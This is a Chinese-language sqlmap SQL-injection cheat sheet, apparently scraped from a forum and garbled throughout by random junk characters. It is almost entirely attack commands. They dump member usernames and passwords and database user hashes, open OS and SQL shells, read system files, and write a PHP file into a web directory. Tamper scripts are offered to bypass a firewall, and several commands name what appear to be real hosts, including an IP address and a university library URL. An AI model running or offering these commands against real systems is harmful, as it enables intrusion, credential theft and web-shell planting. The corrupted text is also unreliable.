/pentest/database/sqlmap
5 _0 m4 I3 [2 M$ N# N
" A; s% \; O& S/ X0 S3 R/ f* supdate :::::> in the folder after execute following order : svn update) N$ J) v1 ~4 w8 s
/ E+ F0 J0 c+ ?4 S6 isqlmap.py -r 1.txt --current-db6 F1 i" D2 i% I1 B" F5 _
9 f6 i! _$ \6 B. _, j; x7 O0 Kv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”$ N, M- k- b; a. K7 J
+ t" h V& A, F; ?! U* Z% p# F
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
7 p @: }; K! \" S, P# z6 f猜解数据库
. ?. H, B) k L; h$ M./sqlmap.py -u "injection-url" --dbs
4 G4 |8 F' v7 a$ c ssqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py") M% r$ N9 K$ r' g0 g% G" w
9 }0 \( w% E" x- D
猜解表名
/ r5 W1 @7 ^1 f1 g./sqlmap.py -u "injection-url" -D database_name --tables
3 m, x+ D, @8 S `2 h
. l/ w9 e8 m5 c% i7 x ]- Zsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"8 M, e7 K4 ^, ? o" u0 n" F
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py" ! X: C- _; x8 T5 \) A9 N
- M( I; s8 L6 V! b: ^' s
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
7 _# z8 X4 _# p, B& s8 }) |: c& A4 Q) a9 |' ~- u( O
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
" [+ o5 ]3 R" v0 Psqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"( w) h1 a2 p! m6 I4 g2 y
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
# Q" i s! f2 vsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"& c. p5 c3 M0 y1 Z) O4 x7 S: F
$ n/ r# l! Y+ ^sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"% w5 X& U; E7 \1 k6 N1 _- A
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py". p, j0 m, V9 ~7 Y+ D
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"% A) G/ `6 h/ }$ e
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
8 S( p5 n, U- K3 n Fsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump5 ~7 a4 g3 {8 ]9 h4 s& F5 [
" V& W& T% }1 A7 z
sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了
: h! c t1 o) B8 D# @& Nsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"7 u% |- |, k1 H; b
6 w; B; M% Z% s. t" K8 B# Z5 lsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
3 b8 B* ~ [* G- E' ~) c3 G: t4 Q* ~猜解列名2 t% X; h- r) z$ \9 j1 u1 }! j
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns g& X% N0 L# N$ ]: j# s) \
8 T4 S/ a3 Y3 s" e
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
: g! G6 Y/ U5 {3 Bsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
[4 G) N( O( Q. s& H- \$ u& Psqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
; u- R, }( T" }2 m) @2 _3 u
" d: a9 O6 ~) J. fsqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"! J0 r0 l$ g+ a5 _
&submit=Go0 x* y* z8 x: a5 G
猜解值0 C6 [1 s+ |9 Y5 ~ @! t8 L& n/ ^
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump- y8 J( N$ y9 }% n) C
========================================================) Q$ K2 c+ q$ e. E1 u: e; z
搜索表名中包括mana字符的
" I& s$ x3 x3 \+ k- k: ~/sqlmap.py -u "injection-url" -T mana --search. \/ ` u% ^/ E: H7 ` z# k0 M
返回一个交互式sql shell; D# L+ L' m. H- j# K; m! b
/sqlmap.py -u "injection-url" --sql-shell( i0 N/ i+ _( f$ [1 ?2 A
读取指定文件(需权限)) w6 Y0 o) [9 N' u
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
/ s4 L9 c& ]( F4 ^查看当前 用户 及 数据库
; {: S9 g. a* p! ~/ F% H1 i e/sqlmap.py -u "injection-url" --current-user --current-db* Y: Y: M5 G0 U* O* b
本地文件 写入 远程目标绝对路径, g' `6 `: C- ^ C
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径6 e' z- ~6 W9 q, f
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
: M8 r! Z5 `% J5 M: F0 Q: \9 m! g5 ^ k
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
! [% c* L7 A6 d+ S查看某用的权限
6 ~2 {: T( x# S4 K3 C/sqlmap.py -u "injection-url" --privileges -U root
6 t. t2 Z5 x" s# ^1 G% {7 x- x查看当前用户是否为dba) f1 X7 @, M0 N4 X, Q5 w) p9 o
/sqlmap.py -u "injection-url" --is-dba& b3 Z7 l( P1 R- H6 V
读取所有数据库用户或指定数据库用户的密码. u7 Y1 I; P, @5 S% \2 _
sqlmap.py -r 1.txt --users --passwords) ?2 i1 n4 U7 p) I1 ^8 G" j$ z1 C
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
" c& l2 S. H3 f. ]% O# m$ m: Z: _! D! U# |$ \! O4 x% U
/sqlmap.py -u "injection-url" --passwords -U root6 p5 e8 V/ Y% n4 {# u) ^8 }9 j" k
: v7 A( C1 g- u; J6 g) l+ V--start&&--stop 与 --first&&--last 的区别
) Z7 n! L1 m) O: u) O5 L9 {) X8 e3 J/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
5 T. n; \& u- k/ x9 R% K7 n/ z4 M: @; ?
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
# p$ e+ Y1 U9 Q9 A% k a/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
* t" `5 k3 l6 v) T1 Q/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns; @' Q. ?2 o( _
# @) Y$ T: b% M6 d( ^( i执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
% t) ]' M/ y. \' N. w/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"$ Z' h5 D" l$ h0 F
- k' X! {6 B( l( v) _1 Q' @( \9 v |